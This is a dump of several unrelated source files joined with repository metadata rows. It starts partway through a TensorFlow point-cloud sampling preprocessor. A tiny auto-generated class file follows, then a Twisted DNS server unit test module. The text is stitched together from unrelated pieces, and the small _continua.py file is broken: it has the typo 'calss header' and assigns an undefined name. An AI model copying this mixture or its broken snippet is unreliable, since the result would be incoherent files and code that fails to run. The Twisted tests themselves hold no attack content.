                       f'{transformed_dtypes}')
    return transformed_dtypes[0]
class SparseSampler(Preprocessor):
  """Fused SparseCenterSelector and SparseCellGatherFeatures.
  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, F]
  Adds the following features:
  anchor_centers - [num_centers, 3] - Floating point output containing the
  center (x, y, z) locations for tiling anchor boxes.
  cell_center_xyz - [num_centers, 3] - Floating point output containing
  the center (x, y, z) locations for each cell to featurize.
  cell_center_padding - [num_centers] - 0/1 padding for each center.
  cell_points_xyz - [num_centers, num_neighbors, 3] - Floating point
  output containing the (x, y, z) locations for each point for a given
  center.
  cell_feature - [num_centers, num_neighbors, F] - Floating point output
  containing the features for each point for a given center.
  cell_points_padding - [num_centers, num_neighbors] - 0/1 padding
  for the points in each cell.
  """
  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('center_selector', 'farthest', 'Method to sample centers. '
             'Valid options - uniform, farthest.')
    p.Define('neighbor_sampler', 'uniform', 'Method to select neighbors. '
             'Valid options - uniform, closest.')
    p.Define('num_centers', 16, 'The number of centers to sample.')
    p.Define(
        'features_preparation_layers', [],
        'A list of Params for layers to run on the features before '
        'performing farthest point sampling. For example, one may wish to '
        'drop points out of frustum for KITTI before selecting centers. '
        'Note that these layers will not mutate the original features, '
        'instead, a copy will be made.')
    p.Define(
        'keep_z_range', (-np.inf, np.inf),
        'Only points that have z coordinates within this range are kept. '
        'Approximate ground-removal can be performed by specifying a '
        'lower-bound on the z-range.')
    p.Define('num_neighbors', 64, 'Sample these many points within the '
             'neighorhood.')
    p.Define(
        'max_distance', 1.0, 'Points with L2 distances from a center '
        'larger than this threshold are not considered to be in the '
        'neighborhood.')
    return p
  def __init__(self, params):
    """Creates the optional feature-preparation child layers."""
    super().__init__(params)
    p = self.params
    if p.features_preparation_layers:
      self.CreateChildren('features_preparation_layers',
                          p.features_preparation_layers)
  def TransformFeatures(self, features):
    p = self.params
    n, m = p.num_centers, p.num_neighbors
    # Run the (optional) preparation layers on a deep copy so the original
    # features are not mutated.
    prepared_features = features.DeepCopy()
    if p.features_preparation_layers:
      for prep_layer in self.features_preparation_layers:
        prepared_features = prep_layer.FPropDefaultTheta(prepared_features)
    points_data = prepared_features.lasers
    points = py_utils.HasShape(points_data.points_xyz, [-1, 3])
    if 'points_padding' in points_data:
      # Densify: keep only the valid (unpadded) points.
      points_mask = 1 - points_data.points_padding
      points = tf.boolean_mask(points, points_mask)
    # If num_points < num_centers, pad points to have at least num_centers
    # points.
    num_points = tf.shape(points)[0]
    required_num_points = tf.maximum(num_points, p.num_centers)
    zeros = tf.zeros([required_num_points - num_points, 3])
    points = tf.concat([points, zeros], axis=0)
    num_seeded_points = points_data.get('num_seeded_points', 0)
    neighbor_algorithm = 'auto'
    # Based on benchmarks, the hash solution works better when the number of
    # centers is >= 16 and there are at least 10k points per point cloud.
    if p.num_centers >= 16:
      neighbor_algorithm = 'hash'
    # NOTE(review): ops.sample_points is a project custom op; the exact
    # semantics of its outputs are assumed from the variable names below.
    centers, center_paddings, indices, indices_paddings = ops.sample_points(
        points=tf.expand_dims(points, 0),
        points_padding=tf.zeros([1, required_num_points], tf.float32),
        num_seeded_points=num_seeded_points,
        center_selector=p.center_selector,
        neighbor_sampler=p.neighbor_sampler,
        neighbor_algorithm=neighbor_algorithm,
        num_centers=p.num_centers,
        center_z_min=p.keep_z_range[0],
        center_z_max=p.keep_z_range[1],
        num_neighbors=p.num_neighbors,
        max_distance=p.max_distance,
        random_seed=p.random_seed if p.random_seed else -1)
    # The op works on a batch of 1; strip the leading batch dimension.
    centers = py_utils.HasShape(centers, [1, n])[0, :]
    center_paddings = py_utils.HasShape(center_paddings, [1, n])[0, :]
    indices = py_utils.HasShape(indices, [1, n, m])[0, :]
    indices_paddings = py_utils.HasShape(indices_paddings, [1, n, m])[0, :]
    features.cell_center_padding = center_paddings
    features.cell_center_xyz = py_utils.HasShape(
        tf.gather(points, centers), [n, 3])
    # Anchor centers are tiled at the cell centers.
    features.anchor_centers = features.cell_center_xyz
    features.cell_points_xyz = py_utils.HasShape(
        tf.gather(points, indices), [n, m, 3])
    features.cell_feature = tf.gather(points_data.points_feature, indices)
    features.cell_points_padding = indices_paddings
    return features
  def TransformShapes(self, shapes):
    p = self.params
    n, m, f = p.num_centers, p.num_neighbors, shapes.lasers.points_feature[-1]
    shapes.anchor_centers = tf.TensorShape([n, 3])
    shapes.cell_center_padding = tf.TensorShape([n])
    shapes.cell_center_xyz = tf.TensorShape([n, 3])
    shapes.cell_points_xyz = tf.TensorShape([n, m, 3])
    shapes.cell_feature = tf.TensorShape([n, m, f])
    shapes.cell_points_padding = tf.TensorShape([n, m])
    return shapes
  def TransformDTypes(self, dtypes):
    dtypes.anchor_centers = tf.float32
    dtypes.cell_center_padding = tf.float32
    dtypes.cell_center_xyz = tf.float32
    dtypes.cell_points_xyz = tf.float32
    dtypes.cell_feature = tf.float32
    dtypes.cell_points_padding = tf.float32
    return dtypes
| [
"[email protected]"
] | |
68c3277a9fe9cd3efe646288a0c0b687daeb5f40 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_continua.py | 1d4f1175f6f6eee08a5947b834b37af45e65325d | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#calss header
class _CONTINUA():
def __init__(self,):
self.name = "CONTINUA"
self.definitions = continuum
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['continuum']
| [
"[email protected]"
] | |
144e5a7d1b97218faf780fe0706e3cee01e48160 | 37fdc797f0060a67c1e9318032bc7102d4fd9ecd | /spider/beautifulsoup_test/lib/python3.7/site-packages/twisted/names/test/test_server.py | 1378cd4196e91a2ddb3a28c59f527bcdbe43cc1f | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | Change0224/PycharmProjects | 8fa3d23b399c5fb55661a79ca059f3da79847feb | 818ba4fd5dd8bcdaacae490ed106ffda868b6ca4 | refs/heads/master | 2021-02-06T15:37:16.653849 | 2020-03-03T14:30:44 | 2020-03-03T14:30:44 | 243,927,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41,264 | py | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for L{twisted.names.server}.
"""
from __future__ import division, absolute_import
from zope.interface.verify import verifyClass
from twisted.internet import defer
from twisted.internet.interfaces import IProtocolFactory
from twisted.names import dns, error, resolve, server
from twisted.python import failure, log
from twisted.trial import unittest
class RaisedArguments(Exception):
    """
    An exception recording the positional and keyword arguments that
    L{raiser} was invoked with.
    """
    def __init__(self, args, kwargs):
        self.kwargs = kwargs
        self.args = args
def raiser(*args, **kwargs):
    """
    Unconditionally raise a L{RaisedArguments} exception wrapping whatever
    arguments were supplied.

    Used as a fake when testing the call signatures of methods and functions.
    """
    raise RaisedArguments(args, kwargs)
class NoResponseDNSServerFactory(server.DNSServerFactory):
    """
    A L{server.DNSServerFactory} subclass which never replies to any
    received message.

    Used for testing logged messages in C{messageReceived} without having to
    fake or patch the preceding code which attempts to deliver a response
    message.
    """
    def allowQuery(self, message, protocol, address):
        """
        Refuse every query.

        @param message: See L{server.DNSServerFactory.allowQuery}
        @param protocol: See L{server.DNSServerFactory.allowQuery}
        @param address: See L{server.DNSServerFactory.allowQuery}

        @return: L{False}
        @rtype: L{bool}
        """
        return False

    def sendReply(self, protocol, message, address):
        """
        Discard the reply instead of sending it.

        @param protocol: See L{server.DNSServerFactory.sendReply}
        @param message: See L{server.DNSServerFactory.sendReply}
        @param address: See L{server.DNSServerFactory.sendReply}
        """
class RaisingDNSServerFactory(server.DNSServerFactory):
    """
    A L{server.DNSServerFactory} subclass whose C{allowQuery} raises an
    exception wrapping the arguments it received.

    Used for stopping L{messageReceived} and testing the arguments supplied to
    L{allowQuery}.
    """
    class AllowQueryArguments(Exception):
        """
        Carries the positional and keyword arguments in C{args}.
        """
    def allowQuery(self, *args, **kwargs):
        """
        Raise L{AllowQueryArguments} wrapping the supplied arguments.

        @param args: Positional arguments which will be recorded in the raised
            exception.
        @type args: L{tuple}

        @param kwargs: Keyword args which will be recorded in the raised
            exception.
        @type kwargs: L{dict}
        """
        raise self.AllowQueryArguments(args, kwargs)
class RaisingProtocol(object):
    """
    A partial fake L{IProtocol} whose C{writeMessage} raises an exception
    recording the arguments it was called with.
    """
    class WriteMessageArguments(Exception):
        """
        Carries the positional and keyword arguments in C{args}.
        """

    def writeMessage(self, *args, **kwargs):
        """
        Record the call by raising its arguments.

        @param args: Positional arguments
        @type args: L{tuple}

        @param kwargs: Keyword args
        @type kwargs: L{dict}
        """
        raise self.WriteMessageArguments(args, kwargs)
class NoopProtocol(object):
    """
    A partial fake L{dns.DNSProtocolMixin} whose C{writeMessage} silently
    accepts and discards everything.
    """
    def writeMessage(self, *args, **kwargs):
        """
        Do nothing with the supplied arguments.

        @param args: Positional arguments
        @type args: L{tuple}

        @param kwargs: Keyword args
        @type kwargs: L{dict}
        """
class RaisingResolver(object):
    """
    A partial fake L{IResolver} whose C{query} raises an exception recording
    the arguments it was called with.
    """
    class QueryArguments(Exception):
        """
        Carries the positional and keyword arguments in C{args}.
        """

    def query(self, *args, **kwargs):
        """
        Record the call by raising its arguments.

        @param args: Positional arguments
        @type args: L{tuple}

        @param kwargs: Keyword args
        @type kwargs: L{dict}
        """
        raise self.QueryArguments(args, kwargs)
class RaisingCache(object):
    """
    A partial fake L{twisted.names.cache.Cache} whose C{cacheResult} raises
    an exception recording the arguments it was called with.
    """
    class CacheResultArguments(Exception):
        """
        Carries the positional and keyword arguments in C{args}.
        """

    def cacheResult(self, *args, **kwargs):
        """
        Record the call by raising its arguments.

        @param args: Positional arguments
        @type args: L{tuple}

        @param kwargs: Keyword args
        @type kwargs: L{dict}
        """
        raise self.CacheResultArguments(args, kwargs)
def assertLogMessage(testCase, expectedMessages, callable, *args, **kwargs):
    """
    Assert that the callable logs the expected messages when called.

    XXX: Put this somewhere where it can be re-used elsewhere. See #6677.

    @param testCase: The test case controlling the test which triggers the
        logged messages and on which assertions will be called.
    @type testCase: L{unittest.SynchronousTestCase}

    @param expectedMessages: A L{list} of the expected log messages
    @type expectedMessages: L{list}

    @param callable: The function which is expected to produce the
        C{expectedMessages} when called.
    @type callable: L{callable}

    @param args: Positional arguments to be passed to C{callable}.
    @type args: L{list}

    @param kwargs: Keyword arguments to be passed to C{callable}.
    @type kwargs: L{dict}
    """
    loggedMessages = []
    log.addObserver(loggedMessages.append)
    testCase.addCleanup(log.removeObserver, loggedMessages.append)
    callable(*args, **kwargs)
    testCase.assertEqual(
        [m['message'][0] for m in loggedMessages],
        expectedMessages)
class DNSServerFactoryTests(unittest.TestCase):
"""
Tests for L{server.DNSServerFactory}.
"""
def test_resolverType(self):
"""
L{server.DNSServerFactory.resolver} is a L{resolve.ResolverChain}
instance
"""
self.assertIsInstance(
server.DNSServerFactory().resolver,
resolve.ResolverChain)
def test_resolverDefaultEmpty(self):
"""
L{server.DNSServerFactory.resolver} is an empty L{resolve.ResolverChain}
by default.
"""
self.assertEqual(
server.DNSServerFactory().resolver.resolvers,
[])
def test_authorities(self):
"""
L{server.DNSServerFactory.__init__} accepts an C{authorities}
argument. The value of this argument is a list and is used to extend the
C{resolver} L{resolve.ResolverChain}.
"""
dummyResolver = object()
self.assertEqual(
server.DNSServerFactory(
authorities=[dummyResolver]).resolver.resolvers,
[dummyResolver])
def test_caches(self):
"""
L{server.DNSServerFactory.__init__} accepts a C{caches} argument. The
value of this argument is a list and is used to extend the C{resolver}
L{resolve.ResolverChain}.
"""
dummyResolver = object()
self.assertEqual(
server.DNSServerFactory(
caches=[dummyResolver]).resolver.resolvers,
[dummyResolver])
def test_clients(self):
"""
L{server.DNSServerFactory.__init__} accepts a C{clients} argument. The
value of this argument is a list and is used to extend the C{resolver}
L{resolve.ResolverChain}.
"""
dummyResolver = object()
self.assertEqual(
server.DNSServerFactory(
clients=[dummyResolver]).resolver.resolvers,
[dummyResolver])
    def test_resolverOrder(self):
        """
        L{server.DNSServerFactory.resolver} contains an ordered list of
        authorities, caches and clients.
        """
        # Use classes here so that we can see meaningful names in test results
        class DummyAuthority(object):
            pass
        class DummyCache(object):
            pass
        class DummyClient(object):
            pass
        self.assertEqual(
            server.DNSServerFactory(
                authorities=[DummyAuthority],
                caches=[DummyCache],
                clients=[DummyClient]).resolver.resolvers,
            [DummyAuthority, DummyCache, DummyClient])
def test_cacheDefault(self):
"""
L{server.DNSServerFactory.cache} is L{None} by default.
"""
self.assertIsNone(server.DNSServerFactory().cache)
def test_cacheOverride(self):
"""
L{server.DNSServerFactory.__init__} assigns the last object in the
C{caches} list to L{server.DNSServerFactory.cache}.
"""
dummyResolver = object()
self.assertEqual(
server.DNSServerFactory(caches=[object(), dummyResolver]).cache,
dummyResolver)
def test_canRecurseDefault(self):
"""
L{server.DNSServerFactory.canRecurse} is a flag indicating that this
server is capable of performing recursive DNS lookups. It defaults to
L{False}.
"""
self.assertFalse(server.DNSServerFactory().canRecurse)
def test_canRecurseOverride(self):
"""
L{server.DNSServerFactory.__init__} sets C{canRecurse} to L{True} if it
is supplied with C{clients}.
"""
self.assertEqual(
server.DNSServerFactory(clients=[None]).canRecurse, True)
def test_verboseDefault(self):
"""
L{server.DNSServerFactory.verbose} defaults to L{False}.
"""
self.assertFalse(server.DNSServerFactory().verbose)
def test_verboseOverride(self):
"""
L{server.DNSServerFactory.__init__} accepts a C{verbose} argument which
overrides L{server.DNSServerFactory.verbose}.
"""
self.assertTrue(server.DNSServerFactory(verbose=True).verbose)
def test_interface(self):
"""
L{server.DNSServerFactory} implements L{IProtocolFactory}.
"""
self.assertTrue(verifyClass(IProtocolFactory, server.DNSServerFactory))
def test_defaultProtocol(self):
"""
L{server.DNSServerFactory.protocol} defaults to L{dns.DNSProtocol}.
"""
self.assertIs(server.DNSServerFactory.protocol, dns.DNSProtocol)
def test_buildProtocolProtocolOverride(self):
"""
L{server.DNSServerFactory.buildProtocol} builds a protocol by calling
L{server.DNSServerFactory.protocol} with its self as a positional
argument.
"""
class FakeProtocol(object):
factory = None
args = None
kwargs = None
stubProtocol = FakeProtocol()
def fakeProtocolFactory(*args, **kwargs):
stubProtocol.args = args
stubProtocol.kwargs = kwargs
return stubProtocol
f = server.DNSServerFactory()
f.protocol = fakeProtocolFactory
p = f.buildProtocol(addr=None)
self.assertEqual(
(stubProtocol, (f,), {}),
(p, p.args, p.kwargs)
)
def test_verboseLogQuiet(self):
"""
L{server.DNSServerFactory._verboseLog} does not log messages unless
C{verbose > 0}.
"""
f = server.DNSServerFactory()
assertLogMessage(
self,
[],
f._verboseLog,
'Foo Bar'
)
def test_verboseLogVerbose(self):
"""
L{server.DNSServerFactory._verboseLog} logs a message if C{verbose > 0}.
"""
f = server.DNSServerFactory(verbose=1)
assertLogMessage(
self,
['Foo Bar'],
f._verboseLog,
'Foo Bar'
)
def test_messageReceivedLoggingNoQuery(self):
"""
L{server.DNSServerFactory.messageReceived} logs about an empty query if
the message had no queries and C{verbose} is C{>0}.
"""
m = dns.Message()
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Empty query from ('192.0.2.100', 53)"],
f.messageReceived,
message=m, proto=None, address=('192.0.2.100', 53))
def test_messageReceivedLogging1(self):
"""
L{server.DNSServerFactory.messageReceived} logs the query types of all
queries in the message if C{verbose} is set to C{1}.
"""
m = dns.Message()
m.addQuery(name='example.com', type=dns.MX)
m.addQuery(name='example.com', type=dns.AAAA)
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["MX AAAA query from ('192.0.2.100', 53)"],
f.messageReceived,
message=m, proto=None, address=('192.0.2.100', 53))
def test_messageReceivedLogging2(self):
"""
L{server.DNSServerFactory.messageReceived} logs the repr of all queries
in the message if C{verbose} is set to C{2}.
"""
m = dns.Message()
m.addQuery(name='example.com', type=dns.MX)
m.addQuery(name='example.com', type=dns.AAAA)
f = NoResponseDNSServerFactory(verbose=2)
assertLogMessage(
self,
["<Query example.com MX IN> "
"<Query example.com AAAA IN> query from ('192.0.2.100', 53)"],
f.messageReceived,
message=m, proto=None, address=('192.0.2.100', 53))
def test_messageReceivedTimestamp(self):
"""
L{server.DNSServerFactory.messageReceived} assigns a unix timestamp to
the received message.
"""
m = dns.Message()
f = NoResponseDNSServerFactory()
t = object()
self.patch(server.time, 'time', lambda: t)
f.messageReceived(message=m, proto=None, address=None)
self.assertEqual(m.timeReceived, t)
def test_messageReceivedAllowQuery(self):
"""
L{server.DNSServerFactory.messageReceived} passes all messages to
L{server.DNSServerFactory.allowQuery} along with the receiving protocol
and origin address.
"""
message = dns.Message()
dummyProtocol = object()
dummyAddress = object()
f = RaisingDNSServerFactory()
e = self.assertRaises(
RaisingDNSServerFactory.AllowQueryArguments,
f.messageReceived,
message=message, proto=dummyProtocol, address=dummyAddress)
args, kwargs = e.args
self.assertEqual(args, (message, dummyProtocol, dummyAddress))
self.assertEqual(kwargs, {})
def test_allowQueryFalse(self):
"""
If C{allowQuery} returns C{False},
L{server.DNSServerFactory.messageReceived} calls L{server.sendReply}
with a message whose C{rCode} is L{dns.EREFUSED}.
"""
class SendReplyException(Exception):
pass
class RaisingDNSServerFactory(server.DNSServerFactory):
def allowQuery(self, *args, **kwargs):
return False
def sendReply(self, *args, **kwargs):
raise SendReplyException(args, kwargs)
f = RaisingDNSServerFactory()
e = self.assertRaises(
SendReplyException,
f.messageReceived,
message=dns.Message(), proto=None, address=None)
(proto, message, address), kwargs = e.args
self.assertEqual(message.rCode, dns.EREFUSED)
    def _messageReceivedTest(self, methodName, message):
        """
        Assert that the named method is called with the given message when it is
        passed to L{DNSServerFactory.messageReceived}.
        @param methodName: The name of the method which is expected to be
            called.
        @type methodName: L{str}
        @param message: The message which is expected to be passed to the
            C{methodName} method.
        @type message: L{dns.Message}
        """
        # Make it appear to have some queries so that
        # DNSServerFactory.allowQuery allows it.
        message.queries = [None]
        receivedMessages = []
        def fakeHandler(message, protocol, address):
            receivedMessages.append((message, protocol, address))
        protocol = NoopProtocol()
        factory = server.DNSServerFactory(None)
        # Replace the dispatch target on the instance so the call and its
        # arguments can be observed.
        setattr(factory, methodName, fakeHandler)
        factory.messageReceived(message, protocol)
        # messageReceived was invoked without an explicit address, so the
        # handler is expected to receive None for it.
        self.assertEqual(receivedMessages, [(message, protocol, None)])
def test_queryMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_QUERY} on to L{DNSServerFactory.handleQuery}.
"""
self._messageReceivedTest(
'handleQuery', dns.Message(opCode=dns.OP_QUERY))
def test_inverseQueryMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_INVERSE} on to L{DNSServerFactory.handleInverseQuery}.
"""
self._messageReceivedTest(
'handleInverseQuery', dns.Message(opCode=dns.OP_INVERSE))
def test_statusMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_STATUS} on to L{DNSServerFactory.handleStatus}.
"""
self._messageReceivedTest(
'handleStatus', dns.Message(opCode=dns.OP_STATUS))
def test_notifyMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_NOTIFY} on to L{DNSServerFactory.handleNotify}.
"""
self._messageReceivedTest(
'handleNotify', dns.Message(opCode=dns.OP_NOTIFY))
def test_updateMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_UPDATE} on to L{DNSServerFactory.handleOther}.
This may change if the implementation ever covers update messages.
"""
self._messageReceivedTest(
'handleOther', dns.Message(opCode=dns.OP_UPDATE))
def test_connectionTracking(self):
"""
The C{connectionMade} and C{connectionLost} methods of
L{DNSServerFactory} cooperate to keep track of all L{DNSProtocol}
objects created by a factory which are connected.
"""
protoA, protoB = object(), object()
factory = server.DNSServerFactory()
factory.connectionMade(protoA)
self.assertEqual(factory.connections, [protoA])
factory.connectionMade(protoB)
self.assertEqual(factory.connections, [protoA, protoB])
factory.connectionLost(protoA)
self.assertEqual(factory.connections, [protoB])
factory.connectionLost(protoB)
self.assertEqual(factory.connections, [])
def test_handleQuery(self):
"""
L{server.DNSServerFactory.handleQuery} takes the first query from the
supplied message and dispatches it to
L{server.DNSServerFactory.resolver.query}.
"""
m = dns.Message()
m.addQuery(b'one.example.com')
m.addQuery(b'two.example.com')
f = server.DNSServerFactory()
f.resolver = RaisingResolver()
e = self.assertRaises(
RaisingResolver.QueryArguments,
f.handleQuery,
message=m, protocol=NoopProtocol(), address=None)
(query,), kwargs = e.args
self.assertEqual(query, m.queries[0])
def test_handleQueryCallback(self):
"""
L{server.DNSServerFactory.handleQuery} adds
L{server.DNSServerFactory.resolver.gotResolverResponse} as a callback to
the deferred returned by L{server.DNSServerFactory.resolver.query}. It
is called with the query response, the original protocol, message and
origin address.
"""
f = server.DNSServerFactory()
d = defer.Deferred()
class FakeResolver(object):
def query(self, *args, **kwargs):
return d
f.resolver = FakeResolver()
gotResolverResponseArgs = []
def fakeGotResolverResponse(*args, **kwargs):
gotResolverResponseArgs.append((args, kwargs))
f.gotResolverResponse = fakeGotResolverResponse
m = dns.Message()
m.addQuery(b'one.example.com')
stubProtocol = NoopProtocol()
dummyAddress = object()
f.handleQuery(message=m, protocol=stubProtocol, address=dummyAddress)
dummyResponse = object()
d.callback(dummyResponse)
self.assertEqual(
gotResolverResponseArgs,
[((dummyResponse, stubProtocol, m, dummyAddress), {})])
def test_handleQueryErrback(self):
"""
L{server.DNSServerFactory.handleQuery} adds
L{server.DNSServerFactory.resolver.gotResolverError} as an errback to
the deferred returned by L{server.DNSServerFactory.resolver.query}. It
is called with the query failure, the original protocol, message and
origin address.
"""
f = server.DNSServerFactory()
d = defer.Deferred()
class FakeResolver(object):
def query(self, *args, **kwargs):
return d
f.resolver = FakeResolver()
gotResolverErrorArgs = []
def fakeGotResolverError(*args, **kwargs):
gotResolverErrorArgs.append((args, kwargs))
f.gotResolverError = fakeGotResolverError
m = dns.Message()
m.addQuery(b'one.example.com')
stubProtocol = NoopProtocol()
dummyAddress = object()
f.handleQuery(message=m, protocol=stubProtocol, address=dummyAddress)
stubFailure = failure.Failure(Exception())
d.errback(stubFailure)
self.assertEqual(
gotResolverErrorArgs,
[((stubFailure, stubProtocol, m, dummyAddress), {})])
def test_gotResolverResponse(self):
"""
L{server.DNSServerFactory.gotResolverResponse} accepts a tuple of
resource record lists and triggers a response message containing those
resource record lists.
"""
f = server.DNSServerFactory()
answers = []
authority = []
additional = []
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.gotResolverResponse,
(answers, authority, additional),
protocol=RaisingProtocol(), message=dns.Message(), address=None)
(message,), kwargs = e.args
self.assertIs(message.answers, answers)
self.assertIs(message.authority, authority)
self.assertIs(message.additional, additional)
def test_gotResolverResponseCallsResponseFromMessage(self):
"""
L{server.DNSServerFactory.gotResolverResponse} calls
L{server.DNSServerFactory._responseFromMessage} to generate a response.
"""
factory = NoResponseDNSServerFactory()
factory._responseFromMessage = raiser
request = dns.Message()
request.timeReceived = 1
e = self.assertRaises(
RaisedArguments,
factory.gotResolverResponse,
([], [], []),
protocol=None, message=request, address=None
)
self.assertEqual(
((), dict(message=request, rCode=dns.OK,
answers=[], authority=[], additional=[])),
(e.args, e.kwargs)
)
def test_responseFromMessageNewMessage(self):
"""
L{server.DNSServerFactory._responseFromMessage} generates a response
message which is a copy of the request message.
"""
factory = server.DNSServerFactory()
request = dns.Message(answer=False, recAv=False)
response = factory._responseFromMessage(message=request),
self.assertIsNot(request, response)
def test_responseFromMessageRecursionAvailable(self):
"""
L{server.DNSServerFactory._responseFromMessage} generates a response
message whose C{recAV} attribute is L{True} if
L{server.DNSServerFactory.canRecurse} is L{True}.
"""
factory = server.DNSServerFactory()
factory.canRecurse = True
response1 = factory._responseFromMessage(
message=dns.Message(recAv=False))
factory.canRecurse = False
response2 = factory._responseFromMessage(
message=dns.Message(recAv=True))
self.assertEqual(
(True, False),
(response1.recAv, response2.recAv))
def test_responseFromMessageTimeReceived(self):
"""
L{server.DNSServerFactory._responseFromMessage} generates a response
message whose C{timeReceived} attribute has the same value as that found
on the request.
"""
factory = server.DNSServerFactory()
request = dns.Message()
request.timeReceived = 1234
response = factory._responseFromMessage(message=request)
self.assertEqual(request.timeReceived, response.timeReceived)
def test_responseFromMessageMaxSize(self):
"""
L{server.DNSServerFactory._responseFromMessage} generates a response
message whose C{maxSize} attribute has the same value as that found
on the request.
"""
factory = server.DNSServerFactory()
request = dns.Message()
request.maxSize = 0
response = factory._responseFromMessage(message=request)
self.assertEqual(request.maxSize, response.maxSize)
def test_messageFactory(self):
"""
L{server.DNSServerFactory} has a C{_messageFactory} attribute which is
L{dns.Message} by default.
"""
self.assertIs(dns.Message, server.DNSServerFactory._messageFactory)
def test_responseFromMessageCallsMessageFactory(self):
"""
L{server.DNSServerFactory._responseFromMessage} calls
C{dns._responseFromMessage} to generate a response
message from the request message. It supplies the request message and
other keyword arguments which should be passed to the response message
initialiser.
"""
factory = server.DNSServerFactory()
self.patch(dns, '_responseFromMessage', raiser)
request = dns.Message()
e = self.assertRaises(
RaisedArguments,
factory._responseFromMessage,
message=request, rCode=dns.OK
)
self.assertEqual(
((), dict(responseConstructor=factory._messageFactory,
message=request, rCode=dns.OK, recAv=factory.canRecurse,
auth=False)),
(e.args, e.kwargs)
)
def test_responseFromMessageAuthoritativeMessage(self):
"""
L{server.DNSServerFactory._responseFromMessage} marks the response
message as authoritative if any of the answer records are authoritative.
"""
factory = server.DNSServerFactory()
response1 = factory._responseFromMessage(
message=dns.Message(), answers=[dns.RRHeader(auth=True)])
response2 = factory._responseFromMessage(
message=dns.Message(), answers=[dns.RRHeader(auth=False)])
self.assertEqual(
(True, False),
(response1.auth, response2.auth),
)
def test_gotResolverResponseLogging(self):
"""
L{server.DNSServerFactory.gotResolverResponse} logs the total number of
records in the response if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
answers = [dns.RRHeader()]
authority = [dns.RRHeader()]
additional = [dns.RRHeader()]
assertLogMessage(
self,
["Lookup found 3 records"],
f.gotResolverResponse,
(answers, authority, additional),
protocol=NoopProtocol(), message=dns.Message(), address=None)
def test_gotResolverResponseCaching(self):
"""
L{server.DNSServerFactory.gotResolverResponse} caches the response if at
least one cache was provided in the constructor.
"""
f = NoResponseDNSServerFactory(caches=[RaisingCache()])
m = dns.Message()
m.addQuery(b'example.com')
expectedAnswers = [dns.RRHeader()]
expectedAuthority = []
expectedAdditional = []
e = self.assertRaises(
RaisingCache.CacheResultArguments,
f.gotResolverResponse,
(expectedAnswers, expectedAuthority, expectedAdditional),
protocol=NoopProtocol(), message=m, address=None)
(query, (answers, authority, additional)), kwargs = e.args
self.assertEqual(query.name.name, b'example.com')
self.assertIs(answers, expectedAnswers)
self.assertIs(authority, expectedAuthority)
self.assertIs(additional, expectedAdditional)
def test_gotResolverErrorCallsResponseFromMessage(self):
"""
L{server.DNSServerFactory.gotResolverError} calls
L{server.DNSServerFactory._responseFromMessage} to generate a response.
"""
factory = NoResponseDNSServerFactory()
factory._responseFromMessage = raiser
request = dns.Message()
request.timeReceived = 1
e = self.assertRaises(
RaisedArguments,
factory.gotResolverError,
failure.Failure(error.DomainError()),
protocol=None, message=request, address=None
)
self.assertEqual(
((), dict(message=request, rCode=dns.ENAME)),
(e.args, e.kwargs)
)
    def _assertMessageRcodeForError(self, responseError, expectedMessageCode):
        """
        L{server.DNSServerFactory.gotResolverError} accepts a
        L{failure.Failure} and triggers a response message whose rCode
        corresponds to the DNS error contained in the C{Failure}.
        @param responseError: The L{Exception} instance which is expected to
            trigger C{expectedMessageCode} when it is supplied to
            C{gotResolverError}
        @type responseError: L{Exception}
        @param expectedMessageCode: The C{rCode} which is expected in the
            message returned by C{gotResolverError} in response to
            C{responseError}.
        @type expectedMessageCode: L{int}
        """
        f = server.DNSServerFactory()
        e = self.assertRaises(
            RaisingProtocol.WriteMessageArguments,
            f.gotResolverError,
            failure.Failure(responseError),
            protocol=RaisingProtocol(), message=dns.Message(), address=None)
        # RaisingProtocol raised with writeMessage's arguments; the first
        # positional argument is the reply message under inspection.
        (message,), kwargs = e.args
        self.assertEqual(message.rCode, expectedMessageCode)
def test_gotResolverErrorDomainError(self):
"""
L{server.DNSServerFactory.gotResolver} triggers a response message with
an C{rCode} of L{dns.ENAME} if supplied with a L{error.DomainError}.
"""
self._assertMessageRcodeForError(error.DomainError(), dns.ENAME)
def test_gotResolverErrorAuthoritativeDomainError(self):
"""
L{server.DNSServerFactory.gotResolver} triggers a response message with
an C{rCode} of L{dns.ENAME} if supplied with a
L{error.AuthoritativeDomainError}.
"""
self._assertMessageRcodeForError(
error.AuthoritativeDomainError(), dns.ENAME)
def test_gotResolverErrorOtherError(self):
"""
L{server.DNSServerFactory.gotResolver} triggers a response message with
an C{rCode} of L{dns.ESERVER} if supplied with another type of error and
logs the error.
"""
self._assertMessageRcodeForError(KeyError(), dns.ESERVER)
e = self.flushLoggedErrors(KeyError)
self.assertEqual(len(e), 1)
def test_gotResolverErrorLogging(self):
"""
L{server.DNSServerFactory.gotResolver} logs a message if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Lookup failed"],
f.gotResolverError,
failure.Failure(error.DomainError()),
protocol=NoopProtocol(), message=dns.Message(), address=None)
